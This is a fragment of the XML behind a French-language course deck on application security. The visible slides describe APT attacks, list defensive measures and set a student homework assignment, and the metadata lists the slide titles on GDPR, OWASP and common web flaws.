        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E60DD4EE-1311-4140-8953-10449B8F927D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisent les mêmes vecteurs d’attaques que les attaques traditionnelles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ne cherchent pas systématiquement à exploiter une vulnérabilité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le facteur humain est plus souvent utilisé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Mettent rarement en œuvre des attaques de type « déni de service » ou des « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>defacements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> »</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93672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DC04AB-5523-46F0-A26A-15D3DB24569D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Comment s’en protéger ? </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A3D308F-4D3B-4846-8F2C-F46E8331ED2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Maintien des systèmes à jour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sensibilisation des utilisateurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Sensibiliser les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>HelpDesks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> face à des anomalies récurrentes</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Préparation des administrateurs (remontée de logs ou anomalies)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325614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DDC554-C3A0-4004-8F2A-8CC8B877830E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Devoir </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C54581-3D61-49C1-BF28-4D19B07EB684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Choisissez une attaque APT dans la liste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" u="sng" dirty="0"/>
              <a:t>https://fr.wikipedia.org/wiki/Advanced_Persistent_Threat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>    explication de l’exploit ? (3pts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>    comment s’en protéger ? (4pts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>    L’impact politique / économique ? (2pts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Document à rendre contenant au maximum 2 pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Rendu en groupe de minimum 2 personnes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="719374307"/>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14986</TotalTime>
  <Words>10028</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Grand écran</PresentationFormat>
  <Paragraphs>1030</Paragraphs>
  <Slides>93</Slides>
  <Notes>86</Notes>
  <HiddenSlides>16</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93</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="105" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calisto MT</vt:lpstr>
      <vt:lpstr>Google Sans</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>ui-monospace</vt:lpstr>
      <vt:lpstr>Univers Condensed</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>ChronicleVTI</vt:lpstr>
      <vt:lpstr>ChronicleVTI</vt:lpstr>
      <vt:lpstr>SÉCURITÉ DES APPLICATIONS</vt:lpstr>
      <vt:lpstr>Objectif du module</vt:lpstr>
      <vt:lpstr>Généralités </vt:lpstr>
      <vt:lpstr>Généralités – Rappels</vt:lpstr>
      <vt:lpstr>Généralités – Pistes de réflexion</vt:lpstr>
      <vt:lpstr>Généralités – le cahier des charges</vt:lpstr>
      <vt:lpstr>Généralités – La mise en œuvre</vt:lpstr>
      <vt:lpstr>Généralités – La sécurité en entreprise</vt:lpstr>
      <vt:lpstr>Généralités – Les bonnes pratiques (ANSSI)</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Généralités – Délai de piratage des mots de passe</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Généralités – Quelques bonnes pratiques PERSO</vt:lpstr>
      <vt:lpstr>Généralités – BYOD (Bring Your Own Device)</vt:lpstr>
      <vt:lpstr>Généralités – WOOCLAP</vt:lpstr>
      <vt:lpstr>Généralités – Exercice</vt:lpstr>
      <vt:lpstr>RGPD Le Règlement Général sur la Protection des Données</vt:lpstr>
      <vt:lpstr>RGPD – Introduction</vt:lpstr>
      <vt:lpstr>RGPD – Les objectifs</vt:lpstr>
      <vt:lpstr>RGPD – Les Acteurs institutionnels</vt:lpstr>
      <vt:lpstr>RGPD – Les Acteurs institutionnels</vt:lpstr>
      <vt:lpstr>RGPD – Les Acteurs institutionnels</vt:lpstr>
      <vt:lpstr>RGPD – Les données à caractère personnel </vt:lpstr>
      <vt:lpstr>RGPD – Les données à caractère personnel </vt:lpstr>
      <vt:lpstr>RGPD – Des données directement identifiantes  </vt:lpstr>
      <vt:lpstr>RGPD – Des données indirectement identifiantes  </vt:lpstr>
      <vt:lpstr>RGPD – Toutes les combinaisons d’informations   </vt:lpstr>
      <vt:lpstr>RGPD – LES Données dites Sensibles   </vt:lpstr>
      <vt:lpstr>RGPD – Les organismes concernés par l’application du RGPD</vt:lpstr>
      <vt:lpstr>RGPD – Les organismes concernés par l’application du RGPD</vt:lpstr>
      <vt:lpstr>RGPD – Responsable de traitement et Sous-traitant</vt:lpstr>
      <vt:lpstr>RGPD – Les CONTRAINTES au développement</vt:lpstr>
      <vt:lpstr>RGPD – WOOCLAP</vt:lpstr>
      <vt:lpstr>Principes de Protection des Données</vt:lpstr>
      <vt:lpstr>Principes de Protection des Données –  Les 8 règles d’or</vt:lpstr>
      <vt:lpstr>RGPD – La finalité de traitement</vt:lpstr>
      <vt:lpstr>RGPD – La finalité de traitement</vt:lpstr>
      <vt:lpstr>RGPD – La finalité de traitement - Exemples</vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement</vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement – Le Consentement</vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement – La nécessité contractuelle </vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement – Obligation Légale</vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement – Sauvegarde  des intérêts vitaux</vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement – L’intérêt public</vt:lpstr>
      <vt:lpstr>RGPD – La Licéité du traitement – Intérêts légitimes </vt:lpstr>
      <vt:lpstr>RGPD – Bonnes pratiques </vt:lpstr>
      <vt:lpstr>RGPD – Conservation des données</vt:lpstr>
      <vt:lpstr>RGPD – Conservation des données - Exemples</vt:lpstr>
      <vt:lpstr>RGPD – Les grands principes</vt:lpstr>
      <vt:lpstr>Principes de Protection des Données –  EXEMPLES CONCRETS</vt:lpstr>
      <vt:lpstr>RGPD – Exercice</vt:lpstr>
      <vt:lpstr>RGPD – WOOCLAP</vt:lpstr>
      <vt:lpstr>Méthode PDCA</vt:lpstr>
      <vt:lpstr>Méthode PDCA – Plan Do Check Act ou Roue de Deming</vt:lpstr>
      <vt:lpstr>Méthode PDCA</vt:lpstr>
      <vt:lpstr>Sécurité des applications – jour 2 &amp; 3 communication du planning</vt:lpstr>
      <vt:lpstr>Organisation du module</vt:lpstr>
      <vt:lpstr>Failles communes</vt:lpstr>
      <vt:lpstr>4 principales FAILLEs</vt:lpstr>
      <vt:lpstr>Failles communes – OWSAP Top TEN Top 10 Web Application Security Risks</vt:lpstr>
      <vt:lpstr>Failles communes – OWSAP Top TEN Top 10 Web Application Security Risks</vt:lpstr>
      <vt:lpstr>Failles communes – OWSAP Top TEN Top 10 Web Application Security Risks</vt:lpstr>
      <vt:lpstr>Failles communes – OWASP Top TEN Top 10 Web Application Security Risks</vt:lpstr>
      <vt:lpstr>Failles communes – Les différents types d’attaquant</vt:lpstr>
      <vt:lpstr>Initiation à ROOT-ME</vt:lpstr>
      <vt:lpstr>Failles communes – exemple d’une injection SQL Client</vt:lpstr>
      <vt:lpstr>Failles communes – exemple d’une injection SQL Serveur</vt:lpstr>
      <vt:lpstr>Failles communes – injection SQL Serveur – Exercice Python</vt:lpstr>
      <vt:lpstr>Failles communes – injection SQL Serveur – Exercice PHP</vt:lpstr>
      <vt:lpstr>Failles communes – exemple Cross-site Scripting </vt:lpstr>
      <vt:lpstr>Failles communes – exemple Cross-site Scripting </vt:lpstr>
      <vt:lpstr>Failles communes – exemple Cross-site Scripting </vt:lpstr>
      <vt:lpstr>Failles communes – Cross-site Scripting - exercice </vt:lpstr>
      <vt:lpstr>Failles communes – exemple Cross-site Scripting  ROOT ME</vt:lpstr>
      <vt:lpstr>Failles communes – exemple  Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Failles communes – exemple  Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Failles communes – exemple  Cross-Site Request Forgery (CSRF)  ROOT ME</vt:lpstr>
      <vt:lpstr>Failles communes – exemple  Local Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Failles communes – exemple  Local Remote File Inclusion</vt:lpstr>
      <vt:lpstr>Failles communes – exemple  Local Remote File Inclusion  ROOT ME</vt:lpstr>
      <vt:lpstr>Failles communes – WOOCLAP</vt:lpstr>
      <vt:lpstr>APT</vt:lpstr>
      <vt:lpstr>Qu'est-ce qu'une attaque APT ?</vt:lpstr>
      <vt:lpstr>Advanced Persistent Threat</vt:lpstr>
      <vt:lpstr>Advanced Persistent Threat</vt:lpstr>
      <vt:lpstr>Advanced Persistent Threat</vt:lpstr>
      <vt:lpstr>Particularités des APT</vt:lpstr>
      <vt:lpstr>Comment s’en protéger ? </vt:lpstr>
      <vt:lpstr>Devoir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SÉCURITÉ DES SYSTÈMES ET RÉSEAUX</dc:title>
  <dc:creator>LENOBLE Guillaume</dc:creator>
  <cp:lastModifiedBy>Thibault VINCHENT</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-16T11:46:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-11T07:17:04Z</dcterms:modified>
</cp:coreProperties>
</file>